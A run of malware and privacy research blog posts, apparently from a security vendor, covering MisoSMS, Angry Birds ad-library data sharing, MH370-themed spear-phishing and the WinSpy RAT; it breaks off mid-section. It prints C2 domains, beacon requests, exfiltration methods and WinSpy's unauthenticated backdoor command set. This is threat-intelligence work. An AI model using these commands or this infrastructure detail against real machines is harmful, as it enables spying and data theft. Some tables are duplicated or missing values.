[caption id="attachment_5080" align="aligncenter" width="621"]New infection registration to the CnC Server Figure 1 - New Infection Registration[/caption]

Figure 2 and Figure 3 show the SMS exfiltration mechanism, as seen in Figure 1, the first four bytes of the encrypted payload contains the length indicator of the payload. The intercepted SMS message is sent to the CnC with the Device ID of the already compromised device.

[caption id="attachment_5078" align="aligncenter" width="640"]Encrypted CnC Communication containing stolen SMS Figure 2 - Encrypted CnC Communication containing stolen SMS[/caption]

[caption id="attachment_5079" align="aligncenter" width="640"]Decrypted CnC Communication containing stolen SMS Figure 3 - Decrypted CnC Communication containing stolen SMS[/caption]

The domain name of the CnC is also encrypted and stored as a byte array in the native binary. Once the encrypted byte array containing the CnC information is decrypted, the malware checks to see whether the CnC is a domain or an IP address.

That check is  meaningful. Its existence implies the ability to change the CnC information dynamically. And that ability, in turn, suggests that MisoSMS uses excerpts of publically available code.

The CnC server currently serves a Web page that resembles an Android app, as shown in Figure 4.

[caption id="attachment_5081" align="aligncenter" width="349"]CnC serving an webpage Figure 4 - CnC serving an webpage[/caption]

The Web page contains a link pointing to “hxxps://[dot]apk,” which is currently not available. Like the website, the MisoSMS app itself displays Korean text.

The newest version of MisoSMS suggests that cyber attackers are increasingly eyeing mobile devices — and the valuable information they store — as targets. It also serves as a vivid reminder of how crucial protecting this threat vector is in today’s mobile environment.

A Little Bird Told Me: Personal Information Sharing in Angry Birds and its Ad Libraries

Many popular mobile apps, including Rovio’s ubiquitous Angry Birds, collect and share players’ personal information much more widely than most people realize.

Some news reports have begun to scratch the surface of the situation. The New York Times reported on Angry Birds and other data-hungry apps last October. And in January, the newspaper teamed up with public-interest news site ProPublica and U.K. newspaper the Guardian for a series of stories detailing how government agencies use the game (and other mobile apps) to collect personal data. Even the long-running CBS show 60 Minutes reported earlier this month that Rovio shares users’ locations.

The Android version of Angry Birds in the Google Play store, updated on March 4, continues to share personal information. In fact, more than a quarter billion users who create Rovio accounts to save their game progress across multiple devices might be unwittingly sharing all kinds of information—age, gender, and more — with multiple parties. And many more users who play the game without a Rovio account are sharing their device information without realizing it.

Once a Rovio account is created and personal information uploaded, the user can do little to stop this personal information sharing. Their data might be in multiple locations: Angry Birds Cloud, Burstly (ad mediation platform), and third-party ad networks such as Jumptap and Millennial Media. Users can avoid sharing personal data by playing Angry Birds without Rovio account, but that won’t stop the game from sharing device information.

In this blog post, we examine the personal information Angry Birds collects. We also demonstrate the relationships between the app, the ad mediation platform, and the ad clouds — showing how the information flows among the three. We also spell out the evidence, such as network packet capture (PCap) from FireEye Mobile Threat Prevention (MTP), to support our information flow chart. Finally, we reveal how the multi-stage information sharing works by tracking the code paths from the reverse-engineered source code.

To investigate the mechanism and contents of the information sharing, we researched different versions of Angry Birds. We found that multiple versions of the game can share personal information in clear text, including email, address, age, and gender.

Angry Birds’ data management service, “,” shares information in the penultimate version of the game (V4.0.0), which was offered in the Google Play store through March 4.  And contrary to media reports that this data sharing occurred only on an older “special edition” of the game, we found that some  sharing occurs in multiple versions of Angry Birds — including the latest to the “classic” version, 4.1.0. (This update as added to Google Play on March 4.) With more than 2 billion downloads of Angry Birds so far, this sharing affects many, many devices.

What information is shared?

Angry Birds encourages players to create Rovio accounts, touting the following benefits:

  • To save scores and in-game weapons
  • To preserve game progress across multiple devicesThe second benefit is especially attractive to devoted Angry Birds players because it allows them to stop playing on one device and pick up where they left off on another. Figure 1 shows the Rovio registration page.


    [caption id="attachment_4889" align="aligncenter" width="546"]Figure 1. The registration page of the Rovio account. Figure 1: Rovio’s registration page[/caption]

    Figure 2 shows birthday information collected during registration. The end-use license agreement (EULA) and privacy policy grant Rovio rights to upload the collected information to third-party entities for marketing.

    [caption id="attachment_4894" align="aligncenter" width="546"]Figure 2. The registration of the Rovio account includes personal information and EULA. Figure 2: The registration of the Rovio account includes personal information and EULA.[/caption]

    In Figure 3, the registration page asks for the user’s email address and gender.  When the player clicks the register button, Rovio uploads the collected data to the Angry Birds Cloud to create a player profile.

    [caption id="attachment_4897" align="aligncenter" width="546"]Figure 3. The personal information during the registration process. Figure 3: Rovio asks for email and gender information during registration.[/caption]

    Figure 4 shows another way Angry Birds collects personal information.  Rovio offers a newsletter to update Angry Birds players with new games, episodes, and special offers.  During newsletter signup, Rovio collects the player’s first and last name, email address, date of birth, country of residence, and gender. This information is aggregated with the user’s Rovio account profile by matching the player’s email address.

    [caption id="attachment_4899" align="aligncenter" width="546"]Figure 4. Newsletter registration page with more personal information. Figure 4: Newsletter registration page requesting more personal information[/caption]

    [caption id="attachment_5017" align="alignnone" width="549"]Figure 5. Information flow among Angry Birds, the ad intermediate platform and the ad cloud. Figure 5: Information flow among Angry Birds, the ad intermediate platform and the ad cloud[/caption]

    First, we are concerned with the type of information transmitted to the advertisement library. Figure 5 illustrates the information flow among Angry Birds, the Angry Birds Cloud, Burstly (the embedded ad library and ad mediation platform), and cloud-based ad services such as Jumptap and Millennial Media.

    Angry Birds uses Burstly as an ad adapter, which provides integration with numerous third-party ad clouds including Jumptap and Millennial Media. The ad services use players’ personal data to target ads.

    As the figure shows, Angry Birds maintains an HTTP connection with the advertising platform Burstly, the advertisement provider Millennial Media, and more.

    Traffic flow

    Table 1 summarizes the connections, which we explain in detail below.

    PCap Burstly (Ad Mediation Platform) Third Party Ad Clouds
    1 1 POST (personal information, IP) POST (personal information, IP)
    2 2 GET Ad from Jumptap GET Ad from Jumptap
    3 3 GET Ad from GET Ad from

    Table 1: PCap information exchanged between Angry Birds, Burstly and third-party ad clouds

    Angry Birds uses native code called to access storage and help the ad libraries store logs, caches, database, configuration files, and AES-encrypted game data. For users with a Rovio account, this data includes the user's personal information in clear text or easily decrypted formats. For example, some information is stored in clear text in the web view cache called webviewCacheChromium:

    {"accountId":"AC3XXX...XXXA62B","accountExtRef":"hE...fDc","personal":{"firstName":null,"lastName":null,"birthday":"19XXXXX-01", "age":"30", "gender":"FEMALE", "country":"United States" , "countryCode":"US", "marketingConsent":false, "avatarId":"AVXXX...XXX2c","imageAssets":[...], "nickName":null}, "abid":{"email":"eXXX...XXXe@XXX.XXX", "isConfirmed":false}, "phoneNumber":null, "facebook":{"facebookId":"","email":""},"socialNetworks":[]}

    The device is given a universal id 1XXXX8, which is stored in the webviewCookiesChromium database in clear text:


    The id "1XXXX8" labels the personal information when uploaded by the ad mediation platform. Then the information is passed to ad clouds.

    1. The initial traffic captures in the PCap shows what kind of information Angry Birds uploads to Burstly:

    HTTP/1.1 200 OK

    Cache-Control: private

    Date: Thu, 06 Mar 2014 XX:XX:XX GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBC #22

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 0

    Content-Length: 0

    Connection: keep-alive

    POST /Services/PubAd.svc/GetSingleAdPlacement HTTP/1.1

    Content-type: text/json; charset=utf-8

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Content-Length: 1690


    Connection: Keep-Alive

    {"data":{"Id":"8XXX5","acceptLanguage":"en","adPool":0,"androidId":"u1XXX...XXXug","bundleId": "com.rovio.angrybirds",…,"cookie":[{"name":"cu1XXX8","value":"3XXX6+PM"},{"name":"vw","value":"ref=1XXX2&dgi=,eL,default,GFW"},{"name":"lc","value":"1XXX8"},{"name":"iuXXXg","value":"x"},{"name":"cuXXX8","value":"3%2XXXPM"},{"name":"fXXXg","value":"ref=1XXX712&crXXX8=2,1&crXXX8=,1"}], "crParms":"age=30,androidstore='', customer='googleplay', gender='FEMALE', version='4.1.0'", "debugFlags":0, "deviceId":"aXXX...XXXd", "encDevId":"xXXX....XXXs=", "encMAC":"iXXX...XXXg=", "ipAddress":"","mac":"1XXX...XXX9", "noTrack":0,"placement":"", "pubTargeting":"age=30, androidstore='', customer='googleplay', gender='FEMALE', version='4.1.0'","rvCR":"", "type":"iq","userAgentInfo":{"Build":"", "BuildID":"323", "Carrier":"","Density":"High", "Device":"AscendY300", "DeviceFamily":"Huawei", "MCC":"0","MNC":"0",...

    We can see the information transmitted to includes gender, age, android id, device id, mac address, device type, etc. In another PCap in which Angry Birds sends POST to the same host name, the IP address is transmitted too:

    HTTP/1.1 200 OK

    POST /Services/v1/SdkConfiguration/Get HTTP/1.1




    According to whois records, the registrant organization of is Burstly, Inc. Therefore, the aforementioned information is actually transmitted to Burstly. It Both PCaps contain the keyword “crParms.” This keyword is also used in the source code to put personal information into a map sent as a payload. is an app monetization service provided by Burstly. The following PCap shows that Angry Birds retrieves the customer ID from through an HTTP GET request:

    HTTP/1.1 200 OK

    Cache-Control: private

    Content-Type: text/html

    Date: Thu, 06 Mar 2014 07:12:25 GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBA #5

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 2

    X-Stats: geo-0

    Content-Length: 9606

    Connection: keep-alive

    GET /7….4/ad/image/1...c.jpg HTTP/1.1

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


    Connection: Keep-Alive

    {"type":"ip","Id":"9XXX8",..."data":[{"imageUrl":"","adType":{"width":300, "height":250, "extendedProperty":80}, "dataType": 64, "textAdType":0,"destType":1,"destParms":"","cookie":[{"name":"fXXXg", "value": "ref=1XXX2&cr1XXX8=2,1&cr1XXX8=1&aoXXX8=", "path":"/", "domain": "", "expires":"Sat, 05 Apr 2014 XXX GMT", "maxage": 2…0}, {"name":"vw","value":"ref=1XXX2&...},...,"cbi":"","cbia":["http://bs….":1,"expires":60},..."color":{"bg":"0…0"}, "isInterstitial":1}

    2. In this PCap, the ad is fetched by including the customer id 1XXX8 into the HTTP POST request to, i.e. Millennial Media:

    HTTP/1.1 200 OK

    Cache-Control: private

    Content-Type: text/html

    Date: Thu, XX Mar 2014 XX:XX:XX GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBC #17

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 475

    X-Stats: geo-0;rcf88626-255;rcf75152-218

    Content-Length: 2537

    Connection: keep-alive

    GET /img/1547/1XXX2.jpg HTTP/1.1


    Connection: keep-alive

    Referer: http://bar/

    X-Requested-With: com.rovio.angrybirds

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Accept-Encoding: gzip,deflate

    Accept-Language: en-US

    Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

    {"type":"ip","Id":"8XXX5","width":320,"height":50,"cookie":[],"data":[{"data":"<!-- AdPlacement : banner_ingame_burstly…","adType":{"width":320, "height":50, "extendedProperty":2064 },"dataType":1, "textAdType":0, "destType":10, "destParms":"", "cookie":[{"name":"...", "value":"ref=...&cr1XXX8=4,1&cr1XXX8=2,1", "path":"/", "domain":"", "expires":"Sat, 0X Apr 2014 0X:XX:XX GMT", "maxage":2XXX0}, {"name":"vw",..., "crid":7XXX2, "aoid":3XXX3, "iTrkData":"...", "clkData":"...","feedName":"Nexage"}]}

    In this pcap, the advertisement is retrieved from We can use the same customer id “1XXXX8” to easily track the PCap of different ad libraries.

    3. For example, in another PCap from, customer id remains the same:

    HTTP/1.1 200 OK

    Cache-Control: private

    Content-Type: text/html

    Date: Thu, 06 Mar 2014 07:30:54 GMT

    Server: Microsoft-IIS/7.5

    ServerName: P-ADS-OR-WEBB #6

    X-AspNet-Version: 4.0.30319

    X-Powered-By: ASP.NET

    X-ReqTime: 273

    X-Stats: geo-0;rcf88626-272

    Content-Length: 4714

    Connection: keep-alive

    GET /server/ads.js?pub=24…

    PvctPFq&acp=0.51 HTTP/1.1


    Connection: keep-alive

    Referer: http://bar/

    Accept: */*

    X-Requested-With: com.rovio.angrybirds

    User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; Ascend Y300 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

    Accept-Encoding: gzip,deflate

    Accept-Language: en-US

    Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

    {"type":"ip","Id":"0...b","width":320,"height":50,"cookie":[],"data":[{"data":"<!-- AdPlacement : banner_ingame_burstly --> \"" destParms":"", "cookie":[{"name":"f...g", "value":"ref=1...0&cr1XXXX8=k,1&cr...8=i, 1","path":"/", "domain":"", "expires":"Sat, 0X Apr 2014 0X:XX:XX

    How is the personal information shared?

    We also researched the source code of the Burstly (ad mediation platform) to trace the method calls for the information sharing. First in com/burstly/lib/conveniencelayer/BurstlyAnimated, when Angry Birds tries to initialize the connection with Burstly,   initNewAnimatedBanner() is called as follows:

    this.initNewAnimatedBanner (arg7.getActivity(), arg8, arg9, arg10, arg11);

    Inside initNewAnimatedBanner(), it instantiates the BurstlyView object by calling:

    BurstlyView v0 = new BurstlyView(((Context)arg3));


    Before the ZoneId is set, the initializeView() method is called in the constructor of BurstlyView. Furthermore, inside the initializeView() method, we found the following:

    new BurstlyViewConfigurator(this).configure(this.mAttributes);

    Finally in the BurstlyViewConfigurator.configure() method, it sets a series of parameters:








    These method calls are to retrieve information from For example, in the extractAndApplyCrParams() method, it retrieves parameters from and stores them in the BurstlyView object:

    String v0 = this.mAttributes.getAttributeValue("", "crParams");

    if(v0 != null) {

    BurstlyViewConfigurator.LOG.logDebug("BurstlyViewConfigurator", "Setting CR params to: {0}", new Object[]{v0});



    The key crParms is the same one used in the first PCap to label the values corresponding to personal information such as age and gender.


    In summary, Angry Birds collects user’s personal information and associates with customer id before storing it in the smart phone storage. Then the Burstly ad library embedded in Angry Birds fetches the customer id, uploads the corresponding personal information to the Burstly cloud, and transmits it to other advertising clouds. We have caught such traffics in the network packet captures and the corresponding code paths in the reversed engineered source code.

    For FireEye ThreatScore information on Angry Birds and more details about the application’s behavior, FireEye Mobile Threat Prevention customers can access their Mobile Threat Prevention (MTP) portal.


Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370

While many advanced persistent threat (APT) groups have increasingly embraced strategic Web compromise as a malware delivery vector, groups also continue to rely on spear-phishing emails that leverage popular news stories. The recent tragic disappearance of flight MH 370 is no exception. This post will examine multiple instances from different threat groups, all using spear-phishing messages and leveraging the disappearance of Flight 370 as a lure to convince the target to open a malicious attachment.

“Admin@338” Targets an APAC Government and U.S. Think Tank

The first spear phish from group “Admin@338” was sent to a foreign government in the Asian Pacific region on March 10, 2014 – just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, “Malaysian Airlines MH370.doc” (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of “decoy content” upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.

The attachment dropped a Poison Ivy variant into the path C:\DOCUME~1\admin\LOCALS~1\Temp\kav.exe (MD5: 9dbe491b7d614251e75fb19e8b1b0d0d), which, in turn, beaconed outbound to www.verizon.proxydns[.]com. This Poison Ivy variant was configured with the connection password “wwwst@Admin.” The APT group we refer to as Admin@338 has previously used Poison Ivy implants with this same password. We document the Admin@338 group’s activities in our Poison Ivy: Assessing Damage and Extracting Intelligence paper. Further, the domain www.verizon.proxydns[.]com previously resolved to the following IP addresses that have also been used by the Admin@338 group:

IP Address First Seen Last Seen 2013-08-27 2013-08-27 2013-08-28 2013-08-28 2013-08-28 2013-08-28 2013-08-31 2013-08-31 2013-09-03 2013-09-03 2014-03-07 2014-03-07 2014-03-07 2014-03-07 2014-03-19 2014-03-19

A second targeted attack attributed to the same Admin@338 group was sent to a prominent U.S.-based think tank on March 14, 2014. This spear phish contained an attachment that dropped “Malaysian Airlines MH370 5m Video.exe” (MD5: b869dc959daac3458b6a81bc006e5b97). The malware sample was crafted to appear as though it was a Flash video, by binding a Flash icon to the malicious executable.


Interestingly, in this case, the malware sets its persistence in the normal “Run” registry location, but it tries to auto start the payload from the disk directory “c:\programdata”, which doesn’t exist until Windows 7, so a simple reboot would mitigate this threat on Windows XP. This suggests the threat actors did not perform quality control on the malware or were simply careless. We detect this implant as Backdoor.APT.WinHTTPHelper. The Admin@338 group discussed above has used variants of this same malware family in previous targeted attacks.

This specific implant beacons out to dpmc.dynssl[.]com:443 and www.dpmc.dynssl[.]com:80. The domain dpmc.dynssl[.]com resolved to the following IPs:

IP Address First Seen Last Seen 2013-11-01 2013-11-01 2013-11-29 2013-11-29 2014-01-10 2014-01-10 2014-03-08 2014-03-08 2014-03-14 2014-03-14 2014-03-17 2014-03-17 2014-03-17 2014-03-17 2014-03-19 2014-03-19

The www.dpmc.dynssl[.]com domain resolved to following IPs:

IP Address First Seen Last Seen 2013-10-30 2013-10-30 2013-11-29 2013-11-29 2014-01-10 2014-01-10 2014-03-08 2014-03-08 2014-03-14 2014-03-14 2014-03-18 2014-03-18 2014-03-17 2014-03-17 2014-03-19 2014-03-19

Note that the www.verizon.proxydns[.]com domain used by the Poison Ivy discussed above also resolved to both and during the same time frame as the Backdoor.APT.WinHTTPHelper command and control (CnC) located at dpmc.dynssl[.]com and www.dpmc.dynssl[.]com.

In addition to the above activity attributed to the Admin@338 group, a number of other malicious documents abusing the missing Flight 370 story were also seen in the wild. Other threat groups likely sent these other documents.

The Naikon Lures

On March 9, 2014, a malicious executable entitled the “Search for MH370 continues as report says FBI agents on way to offer assistance.pdf .exe“ (MD5: 52408bffd295b3e69e983be9bdcdd6aa) was seen circulating in the wild. This sample beacons to the CnC net.googlereader[.]pw:443. We have identified this sample, via forensic analysis, as Backdoor.APT.Naikon.

It uses a standard technique of changing its icon to make it appear to be a PDF, in order to lend to its credibility. This same icon, embedded as a PE Resource, has been used in the following recent samples:


MD5 Import hash CnC Server
fcc59add998760b76f009b1fdfacf840 fcc59add998760b76f009b1fdfacf840 e30e07abf1633e10c2d1fbf34e9333d6 e30e07abf1633e10c2d1fbf34e9333d6 ecoh.oicp[.]net ecoh.oicp[.]net
018f762da9b51d7557062548d2b91eeb 018f762da9b51d7557062548d2b91eeb e30e07abf1633e10c2d1fbf34e9333d6 e30e07abf1633e10c2d1fbf34e9333d6 orayjue.eicp[.]net orayjue.eicp[.]net
fcc59add998760b76f009b1fdfacf840 fcc59add998760b76f009b1fdfacf840 e30e07abf1633e10c2d1fbf34e9333d6 e30e07abf1633e10c2d1fbf34e9333d6 ecoh.oicp[.]net:443 ecoh.oicp[.]net:443
498aaf6df71211f9fcb8f182a71fc1f0 498aaf6df71211f9fcb8f182a71fc1f0 a692dca39e952b61501a278ebafab97f a692dca39e952b61501a278ebafab97f xl.findmy[.]pw xl.findmy[.]pw
a093440e75ff4fef256f5a9c1106069a a093440e75ff4fef256f5a9c1106069a a692dca39e952b61501a278ebafab97f a692dca39e952b61501a278ebafab97f xl.findmy[.]pw xl.findmy[.]pw
125dbbb742399ec2c39957920867ee60 125dbbb742399ec2c39957920867ee60 a692dca39e952b61501a278ebafab97f a692dca39e952b61501a278ebafab97f uu.yahoomail[.]pw uu.yahoomail[.]pw
52408bffd295b3e69e983be9bdcdd6aa 52408bffd295b3e69e983be9bdcdd6aa a692dca39e952b61501a278ebafab97f a692dca39e952b61501a278ebafab97f net.googlereader[.]pw net.googlereader[.]pw

This malware leverages “pdfbind” to add a PDF into itself, as can be seen in the debugging strings, and when launched, the malware also presents a decoy document to the target:


The Plat1 Lures

On March 10, 2014, we observed another sample that exploited CVE-2012-0158, titled “MH370班机可以人员身份信息.doc” (MD5: 4ff2156c74e0a36d16fa4aea29f38ff8), which roughly translates to “MH370 Flight Personnel Identity Information”. The malware that is dropped by the malicious Word document, which we detect as Trojan.APT.Plat1, begins to beacon to via TCP over port 80. The decoy document opened after exploitation is blank. The malicious document dropped the following implants:

C:\Documents and Settings\Administrator\Application Data\Intel\ResN32.dll (MD5: 2437f6c333cf61db53b596d192cafe64)

C:\Documents and Settings\Administrator\Application Data\Intel\~y.dll (MD5: d8540b23e52892c6009fdd5812e9c597)

The implants dropped by this malicious document both included unique PDB paths that can be used to find related samples. These paths were as follows:

E:\Work\T5000\T5 Install\ResN\Release\ResN32.pdb

F:\WORK\PROJECT\T5 Install\InstDll\Release\InstDll.pdb

This malware family was also described in more detail here.

The Mongall/Saker Lures

Another sample leveraging the missing airliner theme was seen on March 12, 2014. The malicious document exploited CVE-2012-0158 and was titled, “Missing Malaysia Airlines Flight 370.doc” (MD5: 467478fa0670fa8576b21d860c1523c6). Although the extension looked like a Microsoft Office .DOC file, it was actually an .HTML Application (HTA) file. Once the exploit is successful, the payload makes itself persistent by adding a Windows shortcut (.LNK) file pointing to the malware in the “Startup” folder in the start menu. It beacons outbound to comer4s.minidns[.]net:8070. The network callback pattern, shown below, is known by researchers as “Mongall” or “Saker”:


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)


Cache-Control: no-cache

The sample also drops a decoy file called “aa.doc” into the temp folder and displays the decoy content shown below:


The “Tranchulas” Lures

On March 18, 2014 a sample entitled “Malysia Airline MH370 hijacked by” was sent as a ZIP file (MD5: 7dff5c4ae1b1fea7ecbf7ab787da3468) that contained a Windows screensaver file disguised as a PDF (MD5: b03edbb264aa0c980ab2974652688876). The ZIP file was hosted on This IP address was previously used to host malicious files.

The screen saver file drops “winservice.exe” (MD5: 828d4a66487d25b413cb19ef8ee7c783) which begins beaconing to This IP address was previously used to host a file entitled “” (MD5: a4c7c79308139a7ee70aacf68bba814f).

The initial beacon to the command-and-control server is as follows:

POST /path_active.php?compname=[HOSTNAME]_[USERNAME] HTTP/1.1


Accept: */*

Content-Length: 11

Content-Type: application/x-www-form-urlencoded

This same control server was used in previous activity.

The Page Campaign

A final malicious document was seen abusing the missing Flight 370 story on March 18, 2014. This document exploited CVE-2012-0158 and was entitled “MH370 PM statement 15.03.14 - FINAL.DOC” (MD5: 5e8d64185737f835318489fda46f31a6). This document dropped a Backdoor.APT.Page implant and connected to on both port 80 and 443. The initial beacon traffic over port 80 is as follows:

GET /18110143/page_32180701.html HTTP/1.1

Accept: */*

Cookie: XX=0; BX=0

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)


Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache


While many APT actors have adopted strategic Web compromise as a delivery vector, it is apparent that spear phishing via email-based attachments or links to zip files remain popular with many threat actors, especially when paired with lures discussing current media events. Network defenders should incorporate these facts into their user training programs and be on heightened alert for regular spear-phishing campaigns, which leverage topics dominating the news cycle.

Acknowledgement: We thank Nart Villeneuve and Patrick Olsen for their support, research, and analysis on these findings.

From Windows to Droids: An Insight in to Multi-vector Attack Mechanisms in RATs

FireEye recently observed a targeted attack on a U.S.-based financial institution via a spear-phishing email. The payload used in this campaign is a tool called WinSpy, which is sold by the author as a spying and monitoring tool. The features in this tool resemble that of many other off-the-shelf RATs (Remote Administration Tools) available today. We also observed a second campaign by a different attacker where the WinSpy payload was implanted in macro documents to attack various other targets in what appears to be a spam campaign.

The command-and-control (CnC) infrastructure used in the attack against the financial institution is owned and controlled by author of WinSpy. This does not necessarily mean the author is behind attack as the author provides the use of his server for command and control as well as to store the victim data as the default option in the WinSpy package. This feature allowing shared command-and-control infrastructure advertently or inadvertently provides another level of anonymity and deniability for the attacker.

While analyzing the windows payloads for WinSpy we discovered that it also had Android spying components, which we have dubbed GimmeRat. The Android tool has multiple components allowing the victim’s device to be controlled by another mobile device remotely over SMS messages or alternatively through a Windows-based controller. The Windows-based controller is simplistic and requires physical access to the device. The recent surge in Android-based RATs such as Dendroid and AndroRAT shows a spike in the interest of malicious actors to control mobile devices. GimmeRAT is another startling example of malicious actors venturing into the Android ecosystem.

Attacks Employing WinSpy

While the WinSpy tool is being sold as a spying and monitoring tool for home users, its remote administration capabilities fits the bill for an adversary looking to infiltrate a target or organization. This tool also adds another layer of anonymity for the attacker by using the default command-and-control server provided as part of the WinSpy package.

Figure 1 - Mechanism of attack on financial institution employing WinSpy

The attack targeting a U.S. financial institution arrives via a spear-phishing email. The attachment (b430263181959f4dd681e9d5fd15d2a0) in the email is a large NSIS packed file, which when detonated launches a screenshot of a pay slip as decoy to avert the attention of the victim. It also drops and launches various components as seen in Figure 1 and Figure 2.

Figure 2 - Components of WinSpy

We observed a second attacker using WinSpy in macro documents (78fc7bccd86c645cc66b1a719b6e1258, f496bf5c7bc6843b395cc309da004345) as well as standalone executables (8859bbe7f22729d5b4a7d821cfabb044, 2b19ca87739361fa4d7ee318e6248d05). These arrive either as an attachment or as a link to the payload in emails. The documents had the unique metadata shown below:

File Type                       : XLS

MIME Type                    : application/

Author                          : MR. FRANK

Last Modified By              : MR. FRANK

Software                        : Microsoft Excel

Create Date                    : 2012:02:07 10:41:21

Modify Date                     : 2012:02:07 10:41:29

Security                          : None

Code Page                       : Windows Latin 1 (Western European)

Company                         : USER

App Version                     : 11.5606

The email attacks were found to have attachment names such as

Western Union Slip.xls
Money Transfer Wumt.xls

Windows Components

The WinSpy modules are written in Visual Basic and use some freely available libraries such as modJPEG.bas and cJpeg.cls . The components each support various features as shown below.

Feature Component
Webcam monitoring Webcam monitoring RDS.exe RDS.exe
Screen capture & JPEG Encoder Screen capture & JPEG Encoder RDS.exe RDS.exe
Connectivity check Connectivity check RDS.exe RDS.exe
Send Victim information to CnC Send Victim information to CnC RDS.exe RDS.exe
FTP exfiltration FTP exfiltration RDS.exe RDS.exe
Status Report to CnC Status Report to CnC windns.exe windns.exe
Email/FTP exfiltration Email/FTP exfiltration windns.exe windns.exe
AV Find and Kill AV Find and Kill windns.exe windns.exe
Auto configure firewall Auto configure firewall windns.exe windns.exe
Keylogging and reports Keylogging and reports messenger.exe messenger.exe
Backdoor for remote interaction Backdoor for remote interaction rdbms.exe rdbms.exe
Microphone recording Microphone recording rdbms.exe rdbms.exe
Upload/download/execute files Upload/download/execute files rdbms.exe rdbms.exe
File system browser File system browser rdbms.exe rdbms.exe
Execute remote commands Execute remote commands rdbms.exe rdbms.exe
Send messages to remote machine Send messages to remote machine rdbms.exe rdbms.exe

The WinSpy malware creates its configuration in the registry under "SOFTWARE\MSI64" as shown in Figure 2. The various components of WinSpy read this configuration at runtime. This configuration dictates various settings such as the username, unique identifier, connection parameters, remote FTP server and credentials, filename and path for captured data, current status, etc. The various options in the configuration are abbreviations. For example "DUNIN" stands for date to uninstall, "FTSV" stands for FTP server, "FTUS" stands for FTP user, and so forth. The "SID2" value is a unique ID used to identify the infection and is generated at build time.

Figure 3 - WinSpy Configuration

The WinSpy controller has options to create a new remote file allowing you to choose various parameters and exfiltration options. The author interestingly allows for default command and control and exfiltration options to a server he controls.

Figure 4 - WinSpy Builder

The controller has options to retrieve screenshots, keylogs, and various reports from the victim’s machine. It also has the ability to interact with file system to upload and download files as well as execute new payloads.

Figure 5 - WinSpy Controller

Figure 6 - WinSpy File Browser

Command and Control

The WinSpy payloads have multiple communication methods for reporting status, attacker interaction, and data exfiltration each of which are described below.

Method 1 - I am online :

It reports back to the authors server on port 14001 to report the victim's online status with "/P" and it receives the same command in response to acknowledge.

Figure 7 - Online Status

Method 2 - Victim Information:

It also reports back to the WinSpy author’s server on port 27171 using a secondary protocol shown below. The request contains the victim’s IP address as well as unique identifier generated at build time of the payload. The server responds with a keep alive in response to this request.

Figure 8 - Victim Information
Figure 9 - Victim information

Method 3 - SMTP Exfiltration:

It relays keylog data through SMTP if configured. It relays emails through an SMTP server running on port 37 on the WinSpy author’s server using preconfigured authentication parameters. Port 37 is typically used by NTP protocol but in this case the author has reconfigured it for SMTP relay. The X-Mailer "SysMon v1.0.0" sticks out like a sore thumb.

Figure 10 - SMTP Exfiltration

Method 4 - FTP Exfiltration:

If configured with a custom FTP server, the WinSpy payload will upload all intercepted data and report to the remote server periodically. The FTP credentials are stored in the registry configuration discussed earlier.

Method 5 - Direct Interaction:

The rdbms.exe module listens on port 443 on the victim’s machine. The attacker can directly connect to this port from the WinSpy controller and issue various commands to download captured data, upload/download files, execute files, send messages, view webcam feeds, etc. Any required data transfer is done over Port 444. It supports various commands, the significant ones are shown below. The initial connection commands shows that the author plans to implement authentication at some point in time but as it stands now anyone can connect to an infected instance using this command.

Command Description
/CLUserName.Password. /CLUserName.Password. Initialize connection from controller Initialize connection from controller
/CK /CK Acknowledge Acknowledge
/CB{OptionalPath} /CB{OptionalPath} Enumerates all files in root dir or specified path Enumerates all files in root dir or specified path
/CU{FilePath} /CU{FilePath} Uploads specified File Uploads specified File
/CD{FilePath} /CD{FilePath} Downloads file from specified path Downloads file from specified path
/CD \\\KEYLOGS /CD \\\KEYLOGS Download keylogs Download keylogs
/CD \\\WEBSITED /CD \\\WEBSITED Download websites visited detail report Download websites visited detail report
/CD \\\WEBSITES /CD \\\WEBSITES Download websites visited summary report Download websites visited summary report
/CD \\\ONLINETIME /CD \\\ONLINETIME Download online time report Download online time report
/CD \\\CHATROOM /CD \\\CHATROOM Download chat logs Download chat logs
/CD \\\PCACTIVETIME /CD \\\PCACTIVETIME Download PC active time report Download PC active time report
/RF{FilePath} /RF{FilePath} Execute remote file in specified path Execute remote file in specified path
/WO & /WE /WO & /WE Webcam init and enable Webcam init and enable
/SO /SO Start microphone recording Start microphone recording
/AR{Command} /AR{Command} Run command on remote machine Run command on remote machine
/AM{Message} /AM{Message} Sends message to remote machine Sends message to remote machine

Android Components

